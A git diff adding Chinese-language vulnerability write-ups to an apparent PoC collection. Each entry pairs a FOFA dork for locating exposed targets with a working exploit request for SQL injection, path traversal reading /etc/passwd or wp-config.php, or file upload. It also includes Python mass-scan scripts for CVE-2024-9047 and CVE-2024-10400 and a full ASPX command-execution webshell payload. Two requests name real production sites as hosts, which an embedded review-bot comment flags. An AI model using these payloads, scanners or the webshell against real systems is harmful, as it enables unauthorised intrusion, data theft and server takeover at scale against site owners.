diff --git a/README.md b/README.md index 484319a..0865cb1 100644 --- a/README.md +++ b/README.md @@ -47,6 +47,28 @@ +## 2024.12.28 新增漏洞 + +- [CPAS审计管理系统存在任意文件读取漏洞](./北京友数聚科技/CPAS审计管理系统存在任意文件读取漏洞.md) +- [CPAS审计管理系统getCurserIfAllowLogin存在SQL注入漏洞](./北京友数聚科技/CPAS审计管理系统getCurserIfAllowLogin存在SQL注入漏洞.md) +- [WordPress插件rtw_pdf_file任意文件读取漏洞](./WordPress/WordPress插件rtw_pdf_file任意文件读取漏洞.md) +- [WordPress插件FileUpload任意文件读取漏洞复现(CVE-2024-9047)](./WordPress/WordPress插件FileUpload任意文件读取漏洞复现(CVE-2024-9047).md) +- [WordPress插件Tutor_LMS存在SQL注入漏洞复现(CVE-2024-10400)](./WordPress/WordPress插件Tutor_LMS存在SQL注入漏洞复现(CVE-2024-10400).md) +- [灵当CRM系统接口getMyAmbassador存在SQL注入漏洞](./灵当CRM/灵当CRM系统接口getMyAmbassador存在SQL注入漏洞.md) +- [灵当CRM系统接口uploadfile文件上传漏洞](./灵当CRM/灵当CRM系统接口uploadfile文件上传漏洞.md) +- [卓软计量业务管理平台image.ashx任意文件读取漏洞](./华美卓软/卓软计量业务管理平台image.ashx任意文件读取漏洞.md) +- [博斯外贸管理软件loginednew.jsp存在SQL注入漏洞](./博斯软件/博斯外贸管理软件loginednew.jsp存在SQL注入漏洞.md) +- [博斯外贸管理软件logined.jsp存在SQL注入漏洞](./博斯软件/博斯外贸管理软件logined.jsp存在SQL注入漏洞.md) +- [安科瑞环保用电监管云平台etEnterpriseInfoY存在SQL注入漏洞](./安科瑞/安科瑞环保用电监管云平台etEnterpriseInfoY存在SQL注入漏洞.md) +- [勤云远程稿件处理系统存在SQL注入漏洞](./北京勤云科技/勤云远程稿件处理系统存在SQL注入漏洞.md) +- [赛诸葛数字化智能中台系统login存在SQL注入漏洞](./赛诸葛/赛诸葛数字化智能中台系统login存在SQL注入漏洞.md) +- [网神SecFox运维安全管理与审计系统FastJson反序列化RCE漏洞](./网神/网神SecFox运维安全管理与审计系统FastJson反序列化RCE漏洞.md) +- [朗速ERP系统FileUploadApi.ashx存在文件上传漏洞](./朗速ERP/朗速ERP系统FileUploadApi.ashx存在文件上传漏洞.md) +- [月子会所ERP管理云平台GetData.ashx存在SQL注入](./武汉金同方/月子会所ERP管理云平台GetData.ashx存在SQL注入.md) +- [科汛新职教网校系统CheckOrder存在SQL注入漏洞](./科汛/科汛新职教网校系统CheckOrder存在SQL注入漏洞.md) +- [虹安DLP数据泄漏防护系统pushSetup.do存在SQL注入漏洞](./虹安/虹安DLP数据泄漏防护系统pushSetup.do存在SQL注入漏洞.md) +- [蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞](./蓝凌OA/蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞.md) + ## 2024.12.21 新增漏洞 - [蓝凌EKP系统接口thirdImSyncForKKWebService存在任意文件读取漏洞](./蓝凌OA/蓝凌EKP系统接口thirdImSyncForKKWebService存在任意文件读取漏洞.md) 
diff --git a/WordPress/WordPress插件FileUpload任意文件读取漏洞复现(CVE-2024-9047).md b/WordPress/WordPress插件FileUpload任意文件读取漏洞复现(CVE-2024-9047).md
new file mode 100644
index 0000000..5d6998e
--- /dev/null
+++ b/WordPress/WordPress插件FileUpload任意文件读取漏洞复现(CVE-2024-9047).md
@@ -0,0 +1,116 @@ +# WordPress插件FileUpload任意文件读取漏洞复现(CVE-2024-9047) + +WordPress File Upload插件是一款功能强大的WordPress站点文件上传插件,在 <= 4.24.11 版本前的 wfu_file_downloader.php 文件存在前台任意文件读取+任意文件删除漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。 + +## fofa +```javascript +"wp-content/plugins/wp-file-upload" +``` + +## poc +```python +import requests +import urllib3 +from urllib.parse import urljoin +import argparse +import ssl +import time +import re + +ssl._create_default_https_context = ssl._create_unverified_context +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +def read_file(file_path): + with open(file_path, 'r') as file: + urls = file.read().splitlines() + return urls + +def extract_version(version_text): + match = re.search(r'Version\s+([0-9]+\.[0-9]+\.[0-9]+)', version_text) + if match: + version = match.group(1).strip() + print(f"Found version: {version}") + return version + return None + +def version_to_tuple(version): + return tuple(map(int, version.split('.'))) + +def compare_versions(current_version, target_version='4.24.11'): + if current_version: + current_tuple = version_to_tuple(current_version) + target_tuple = version_to_tuple(target_version) + + if current_tuple <= target_tuple: + print(f"\033[32mVersion {current_version} <= {target_version} - 可能存在漏洞\033[0m") + return True + else: + print(f"Version {current_version} > {target_version} - 无漏洞.") + return False + return False + +def check(url): + protocols = ['http://', 'https://'] + found_vulnerabilities = False + + for protocol in protocols: + target_url = urljoin(protocol + url.lstrip('http://').lstrip('https://'), "/") + print(f"Checking {target_url}wp-content") + + timestamp = str(int(time.time())) + + target_url = urljoin(target_url, 
"/wp-content/plugins/wp-file-upload/wfu_file_downloader.php?file=pQ1DyzbQp5hBxQpW&ticket=Hw8h7dBmxROx27ZZ&handler=dboption&session_legacy=1&dboption_base=cookies&dboption_useold=0&wfu_cookie=wp_wpfileupload_939a4dc9e3d96a97c2dd1bdcbeab52ce") + target_url_version = urljoin(target_url, "/wp-content/plugins/wp-file-upload/release_notes.txt") + + headers = { + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", + "Cookie": f"wp_wpfileupload_939a4dc9e3d96a97c2dd1bdcbeab52ce=cfyMMnYQqNBbcBNMLTCDnE7ezEAdzLC3; wfu_storage_pQ1DyzbQp5hBxQpW=/../../../../../etc/passwd[[name]]; wfu_download_ticket_Hw8h7dBmxROx27ZZ={timestamp}; wfu_ABSPATH=/;" + } + headers_version = { + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" + } + + try: + response_version = requests.get(target_url_version, verify=False, headers=headers_version, timeout=10) + + if response_version.status_code == 200: + version_text = response_version.text + version = extract_version(version_text) + + if compare_versions(version): + response = requests.get(target_url, verify=False, headers=headers, timeout=10) + if response.status_code == 200 and all(key in response.text for key in ('/bin/bash', 'root:x:0:0')): + print(f"\033[31mFind: {url}: WordPress_FileUpload (CVE-2024-9047) - ReadAnyFile!\033[0m") + found_vulnerabilities = True + else: + print(f"版本不匹配跳过检查{url}.") + else: + print(f"找不到版本号 {url}.") + + except Exception as e: + print(f"Error while checking {url}: {e}") + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description="WordPress 任意文件读取漏洞检测") + parser.add_argument("-u", "--url", help="单个url检测") + parser.add_argument("-f", "--txt", help="批量检测") + args = parser.parse_args() + + url = args.url + txt = args.txt + + if url: + check(url) + elif txt: + urls = read_file(txt) + for url in urls: + check(url) + else: + print("help") +``` + 
+![image-20241227214033657](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272140753.png)
+
+## 漏洞来源
+
+- https://github.com/iSee857/CVE-2024-9047-PoC/blob/main/WordPress_FileUpload(CVE-2024-9047)_ReadAnyFile.py
\ No newline at end of file
diff --git a/WordPress/WordPress插件Tutor_LMS存在SQL注入漏洞复现(CVE-2024-10400).md b/WordPress/WordPress插件Tutor_LMS存在SQL注入漏洞复现(CVE-2024-10400).md
new file mode 100644
index 0000000..db037ad
--- /dev/null
+++ b/WordPress/WordPress插件Tutor_LMS存在SQL注入漏洞复现(CVE-2024-10400).md
@@ -0,0 +1,98 @@ +# WordPress插件Tutor_LMS存在SQL注入漏洞复现(CVE-2024-10400) + +WordPress 的 Tutor LMS 插件在 2.7.6 及 2.7.6 之前的所有版本中存在通过 “rating_filter ”参数进行 SQL 注入的漏洞,原因是用户提供的参数未进行充分的转义处理,而且现有的 SQL 查询也未进行预编译。这使得未经认证的攻击者有可能在已有的查询中附加额外的 SQL 查询,从而从数据库中提取敏感信息。 + +## fofa +```javascript +body="/wp-content/plugins/tutor/" +``` + +## poc +```javascript +POST /wp-admin/admin-ajax.php HTTP/1.1 +Host: academy.keune.ch +Content-Type: application/x-www-form-urlencoded + +action=load_filtered_instructor&_tutor_nonce=56803fc221&rating_filter=1e0+and+1=0+Union+select+1,2,3,4,5,6,7,8,9,concat(0x7e,user(),0x7e),11,12,14--+- +``` + +访问网站查看源码,获取_tutor_nonce的参数 + +![image-20241227220244898](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272202950.png) + +![image-20241227220301165](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272203238.png) + +## python脚本 + +```python +import requests +import urllib3 +from urllib.parse import urljoin +import argparse +import ssl +import re + +ssl._create_default_https_context = ssl._create_unverified_context +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +def read_file(file_path): + with open(file_path, 'r') as file: + return file.read().splitlines() + +def check_sql_injection(url): + target_url = url.rstrip("/") + target_url_tutor_nonce = urljoin(target_url, "") + print(target_url_tutor_nonce) + target_endpoint = urljoin(target_url, "/wp-admin/admin-ajax.php") + + headers = { + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15", + "Content-Type": "application/x-www-form-urlencoded" + } + + tutor_nonce = None + + try: + response = requests.get(target_url_tutor_nonce, verify=False, headers=headers, timeout=15) + + match = re.search(r'"_tutor_nonce":"(\w+)"', response.text) + if match: + tutor_nonce = match.group(1) + print(f"\033[32mFound_tutor_nonce: {tutor_nonce}\033[0m") + + if tutor_nonce: + payloads = 
f"action=load_filtered_instructor&_tutor_nonce={tutor_nonce}&rating_filter=1e0+and+1=0+Union+select+111,2222,3333,4,5,6,7,8,9,concat(md5(123321),version()),11,12,14--+-" + + + response = requests.post(target_endpoint, verify=False, headers=headers, timeout=15, data=payloads) + if response.status_code == 200 and all(key in response.text for key in ['c8837b23ff8aaa8a2dde915473ce099110']): + print(f"\033[31mFind: {url}: WordPress_CVE-2024-10400_sql_Injection!\033[0m") + return True + + except requests.RequestException as e: + print(f"Error checking {url}: {e}") + + return False + +def main(): + parser = argparse.ArgumentParser(description="Check for SQL injection vulnerabilities.") + group = parser.add_mutually_exclusive_group(required=True) + group.add_argument("-u", "--url", help="Target URL") + group.add_argument("-f", "--file", help="File containing URLs") + + args = parser.parse_args() + + if args.url: + check_sql_injection(args.url) + elif args.file: + urls = read_file(args.file) + for url in urls: + check_sql_injection(url) + +if __name__ == "__main__": + main() +``` + +## 漏洞来源 + +- https://github.com/iSee857/CVE-PoC/blob/d6dc0f2baa9e65ae8d277f9e67086dc2f4bd72ac/WordPress_CVE-2024-10400_sql_Injection.py#L42 \ No newline at end of file diff --git a/WordPress/WordPress插件rtw_pdf_file任意文件读取漏洞.md b/WordPress/WordPress插件rtw_pdf_file任意文件读取漏洞.md new file mode 100644 index 0000000..4b03603 --- /dev/null +++ b/WordPress/WordPress插件rtw_pdf_file任意文件读取漏洞.md 
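Review bot: The `Host:` header in the poc block names a real third-party site, `Host: academy.keune.ch`, and the `_tutor_nonce` value beside it appears to have been captured from that same site, whereas every other write-up in this commit leaves `Host:` empty. The same applies to `Host: korurealestate.co.uk` in the rtw_pdf_file write-up that follows. Replace both with the empty `Host:` placeholder the rest of the collection uses, so the published request does not point at an identifiable production site.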
@@ -0,0 +1,22 @@
+# WordPress插件rtw_pdf_file任意文件读取漏洞
+
+WordPress插件rtw_pdf_file任意文件读取漏洞,适用于 WordPress 的 Elementor Page Builder 插件的 PDF 生成器插件在 1.7.5 之前的所有版本中都容易受到路径遍历的攻击,包括 1.7.5 rtw_pgaepb_dwnld_pdf() 函数。这使得未经身份验证的攻击者能够读取服务器上任意文件的内容,其中可能包含敏感信息。
+
+## fofa
+```javascript
+"wp-content/plugins/pdf-generator-addon-for-elementor-page-builder"
+```
+
+## poc
+```javascript
+GET /?rtw_pdf_file=../../../wp-config.php&rtw_generate_pdf=1 HTTP/1.1
+Host: korurealestate.co.uk
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![image-20241227211927240](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272119351.png)
\ No newline at end of file
diff --git a/北京勤云科技/勤云远程稿件处理系统存在SQL注入漏洞.md b/北京勤云科技/勤云远程稿件处理系统存在SQL注入漏洞.md
new file mode 100644
index 0000000..b5bddb4
--- /dev/null
+++ b/北京勤云科技/勤云远程稿件处理系统存在SQL注入漏洞.md
@@ -0,0 +1,22 @@
+# 勤云远程稿件处理系统存在SQL注入漏洞
+
+勤云远程稿件处理系统 存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+```javascript
+body="北京勤云科技"
+```
+
+## poc
+```javascript
+GET /burpsuite'if%20db_name(1)='master'%20waitfor%20delay%20'0:0:5'--/article/abstract/1 HTTP/1.1
+Host:
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+```
+
+![image-20241227220754753](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272207815.png)
\ No newline at end of file
diff --git a/北京友数聚科技/CPAS审计管理系统getCurserIfAllowLogin存在SQL注入漏洞.md b/北京友数聚科技/CPAS审计管理系统getCurserIfAllowLogin存在SQL注入漏洞.md
new file mode 100644
index 0000000..de5ea79
--- /dev/null
+++ b/北京友数聚科技/CPAS审计管理系统getCurserIfAllowLogin存在SQL注入漏洞.md
@@ -0,0 +1,24 @@
+# CPAS审计管理系统getCurserIfAllowLogin存在SQL注入漏洞
+
+友数聚 CPAS审计管理系统V4 getCurserIfAllowLogin 接口存在SQL注入,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
+
+## fofa
+```javascript
+body="/cpasm4/static/cap/font/iconfont.css"
+```
+
+## poc
+```javascript
+POST /cpasm4/cpasList/getCurserIfAllowLogin HTTP/1.1
+Host:
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip, deflate
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: text/plain, */*; q=0.01
+
+ygbh=q' AND (SELECT 1635 FROM (SELECT(SLEEP(5)))mlQT) AND 'qoYJ'='qoYJ
+```
+
+![image-20241227215623148](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272156212.png)
\ No newline at end of file
diff --git a/北京友数聚科技/CPAS审计管理系统存在任意文件读取漏洞.md b/北京友数聚科技/CPAS审计管理系统存在任意文件读取漏洞.md
new file mode 100644
index 0000000..9ff0dd8
--- /dev/null
+++ b/北京友数聚科技/CPAS审计管理系统存在任意文件读取漏洞.md
@@ -0,0 +1,22 @@
+# CPAS审计管理系统存在任意文件读取漏洞
+
+CPAS审计管理系统存在任意文件读取漏洞
+
+## fofa
+
+```javascript
+icon_hash="-58141038"
+```
+
+## poc
+
+```javascript
+GET /cpasm4/plugInManController/downPlugs?fileId=../../../../etc/passwd&fileName= HTTP/1.1
+Host:
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+```
+
diff --git a/华美卓软/卓软计量业务管理平台image.ashx任意文件读取漏洞.md b/华美卓软/卓软计量业务管理平台image.ashx任意文件读取漏洞.md
new file mode 100644
index 0000000..95d1107
--- /dev/null
+++ b/华美卓软/卓软计量业务管理平台image.ashx任意文件读取漏洞.md
@@ -0,0 +1,19 @@
+# 卓软计量业务管理平台image.ashx任意文件读取漏洞
+
+卓软计量业务管理平台 image.ashx 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
+
+## fofa
+```javascript
+icon_hash="-334571363"
+```
+
+## poc
+```javascript
+GET /HuameiMeasure/image.ashx?image_path=./../web.config HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
+![image-20241227214332200](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272143297.png)
\ No newline at end of file
diff --git a/博斯软件/博斯外贸管理软件logined.jsp存在SQL注入漏洞.md b/博斯软件/博斯外贸管理软件logined.jsp存在SQL注入漏洞.md
new file mode 100644
index 0000000..fe28031
--- /dev/null
+++ b/博斯软件/博斯外贸管理软件logined.jsp存在SQL注入漏洞.md
@@ -0,0 +1,25 @@
+# 博斯外贸管理软件logined.jsp存在SQL注入漏洞
+
+博斯外贸管理软件V6.0 logined.jsp 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
+
+## fofa
+```javascript
+title="欢迎使用 博斯软件"
+```
+
+## poc
+```javascript
+POST /log/logined.jsp HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br, zstd
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Connection: keep-alive
+
+Submit=-1&account=-1&password=1%27+AND+9085+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%28107%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%289085%3D9085%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%28113%29%29%29+AND+%27GSSe%27%3D%27GSSe
+```
+
+![image-20241227215420546](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272154610.png)
\ No newline at end of file
diff --git a/博斯软件/博斯外贸管理软件loginednew.jsp存在SQL注入漏洞.md b/博斯软件/博斯外贸管理软件loginednew.jsp存在SQL注入漏洞.md
new file mode 100644
index 0000000..c09dc9e
--- /dev/null
+++ b/博斯软件/博斯外贸管理软件loginednew.jsp存在SQL注入漏洞.md
@@ -0,0 +1,21 @@
+# 博斯外贸管理软件loginednew.jsp存在SQL注入漏洞
+
+博斯外贸管理软件V6.0 loginednew.jsp 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
+
+## fofa
+```javascript
+title="欢迎使用 博斯软件"
+```
+
+## poc
+```javascript
+GET /loginednew.jsp?welcome=%BB%B6%D3%AD%CA%B9%D3%C3%20%B2%A9%CB%B9%C8%ED%BC%FEV6.0(20110701)&systemname=BS&account=1%27+UNION+ALL+SELECT+NULL%2CNULL%2CCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28117%29%2BCHAR%28115%29%2BCHAR%28111%29%2BCHAR%28109%29%2BCHAR%28106%29%2BCHAR%2887%29%2BCHAR%28103%29%2BCHAR%2888%29%2BCHAR%28113%29%2BCHAR%2890%29%2BCHAR%28117%29%2BCHAR%2874%29%2BCHAR%28101%29%2BCHAR%28117%29%2BCHAR%28118%29%2BCHAR%28113%29%2BCHAR%2879%29%2BCHAR%2883%29%2BCHAR%2886%29%2BCHAR%28104%29%2BCHAR%2868%29%2BCHAR%2889%29%2BCHAR%28107%29%2BCHAR%2874%29%2BCHAR%2887%29%2BCHAR%2871%29%2BCHAR%28115%29%2BCHAR%28121%29%2BCHAR%2873%29%2BCHAR%28114%29%2BCHAR%2882%29%2BCHAR%2866%29%2BCHAR%28115%29%2BCHAR%2882%29%2BCHAR%2872%29%2BCHAR%28117%29%2BCHAR%28106%29%2BCHAR%28121%29%2BCHAR%2880%29%2BCHAR%28117%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28120%29%2BCHAR%28120%29%2BCHAR%28113%29%2CNULL--+EqLf&password=1&val=0000&availHeight=834&Safari=Y&loginurl= HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+```
+
+![image-20241227215249023](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272152097.png)
\ No newline at end of file
diff --git a/安科瑞/安科瑞环保用电监管云平台etEnterpriseInfoY存在SQL注入漏洞.md b/安科瑞/安科瑞环保用电监管云平台etEnterpriseInfoY存在SQL注入漏洞.md
new file mode 100644
index 0000000..a00acd4
--- /dev/null
+++ b/安科瑞/安科瑞环保用电监管云平台etEnterpriseInfoY存在SQL注入漏洞.md
@@ -0,0 +1,26 @@
+# 安科瑞环保用电监管云平台etEnterpriseInfoY存在SQL注入漏洞
+
+AcrelCloud-3000环保用电监管云平台依托创新的物联网电力传感技术,实时采集企业总用电、生产设备及环保治理设备用电数据,通过关联分析、超限分析、停电分析、停限产分析,结合及时发现环保治理设备未开启、异常关闭及减速、空转、降频等异常情况,同时通过数据分析还可以实时监控限产和停产整治企业运行状态,用户可以利用PC、手机、平板电脑等多种终端实现对平台的访问。
+
+## fofa
+
+```javascript
+body="myCss/phone.css"
+```
+
+## poc
+
+```javascript
+POST /MainMonitor/GetEnterpriseInfoY HTTP/1.1
+Host:
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip, deflate
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: text/plain, */*; q=0.01
+
+EnterpriseId=2107265665700008%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cuser%28%29%29%29and%27&Type=4
+```
+
+![image-20241227215812734](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272158792.png)
\ No newline at end of file
diff --git a/朗速ERP/朗速ERP系统FileUploadApi.ashx存在文件上传漏洞.md b/朗速ERP/朗速ERP系统FileUploadApi.ashx存在文件上传漏洞.md
new file mode 100644
index 0000000..506d24d
--- /dev/null
+++ b/朗速ERP/朗速ERP系统FileUploadApi.ashx存在文件上传漏洞.md
@@ -0,0 +1,44 @@ +# 朗速ERP系统FileUploadApi.ashx存在文件上传漏洞 + + + +## fofa +```javascript +body="/Resource/Scripts/Yw/Yw_Bootstrap.js" +``` + +## poc +```javascript +POST /Api/FileUploadApi.ashx?method=DoWebUpload HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj +Accept: */* +Connection: close + +------WebKitFormBoundaryFfJZ4PlAZBixjELj +Content-Disposition: form-data; name="file"; filename="1.aspx" +Content-Type: image/jpeg + +<%@ Page Language="Jscript" validateRequest="false" %> +<% +var c=new System.Diagnostics.ProcessStartInfo("cmd"); +var e=new System.Diagnostics.Process(); +var out:System.IO.StreamReader,EI:System.IO.StreamReader; +c.UseShellExecute=false; +c.RedirectStandardOutput=true; +c.RedirectStandardError=true; +e.StartInfo=c; +c.Arguments="/c " + Request.Item["cmd"]; +e.Start(); +out=e.StandardOutput; +EI=e.StandardError; +e.Close(); +Response.Write(out.ReadToEnd() + EI.ReadToEnd()); +System.IO.File.Delete(Request.PhysicalPath); +Response.End();%> +------WebKitFormBoundaryFfJZ4PlAZBixjELj-- +``` + +![image-20241227222402497](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272224571.png) \ No newline at end of file diff --git a/武汉金同方/月子会所ERP管理云平台GetData.ashx存在SQL注入.md b/武汉金同方/月子会所ERP管理云平台GetData.ashx存在SQL注入.md new file mode 100644 index 0000000..795f75d --- /dev/null +++ b/武汉金同方/月子会所ERP管理云平台GetData.ashx存在SQL注入.md 
@@ -0,0 +1,21 @@
+# 月子会所ERP管理云平台GetData.ashx存在SQL注入
+
+月子会所ERP管理云平台 GetData.ashx 接口处存在SQL注入漏洞未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+```javascript
+body="月子护理ERP管理平台" || body="妈妈宝盒客户端.rar" || body="Page/Login/Login3.aspx"
+```
+
+## poc
+```javascript
+GET /Page/BasicInfo/ashx/GetData.ashx?ChannelId=&ClientName=1&FitemId=null&Phone=1{{urlescape(' AND 4798 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4798=4798) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(98)+CHAR(113)))-- uTFu)}}&RequestMethod=ApplyActivity&SaleId= HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+```
+
+![image-20241227222800031](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272228089.png)
\ No newline at end of file
diff --git a/灵当CRM/灵当CRM系统接口getMyAmbassador存在SQL注入漏洞.md b/灵当CRM/灵当CRM系统接口getMyAmbassador存在SQL注入漏洞.md
new file mode 100644
index 0000000..29f1ce6
--- /dev/null
+++ b/灵当CRM/灵当CRM系统接口getMyAmbassador存在SQL注入漏洞.md
@@ -0,0 +1,25 @@
+# 灵当CRM系统接口getMyAmbassador存在SQL注入漏洞
+
+灵当CRM系统接口getMyAmbassador存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。
+
+## fofa
+
+```javascript
+body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js")
+```
+
+## poc
+
+```javascript
+POST /crm/WeiXinApp/marketing/index.php?module=Ambassador&action=getMyAmbassador HTTP/1.1
+Host:
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+
+logincrm_userid=-1 union select user(),2,3#
+```
+
+![image-20241227212430930](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272124007.png)
\ No newline at end of file
diff --git a/灵当CRM/灵当CRM系统接口uploadfile文件上传漏洞.md b/灵当CRM/灵当CRM系统接口uploadfile文件上传漏洞.md
new file mode 100644
index 0000000..c88ac2a
--- /dev/null
+++ b/灵当CRM/灵当CRM系统接口uploadfile文件上传漏洞.md
@@ -0,0 +1,32 @@
+# 灵当CRM系统接口uploadfile文件上传漏洞
+
+灵当CRM系统接口uploadfile文件上传漏洞,允许攻击者上传恶意文件到服务器,可能导致远程代码执行、网站篡改或其他形式的攻击,严重威胁系统和数据安全。
+
+## fofa
+
+```javascript
+body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js")
+```
+
+## poc
+
+```javascript
+POST /crm/weixinmp/index.php?userid=123&module=Upload&usid=1&action=uploadfile HTTP/1.1
+Host:
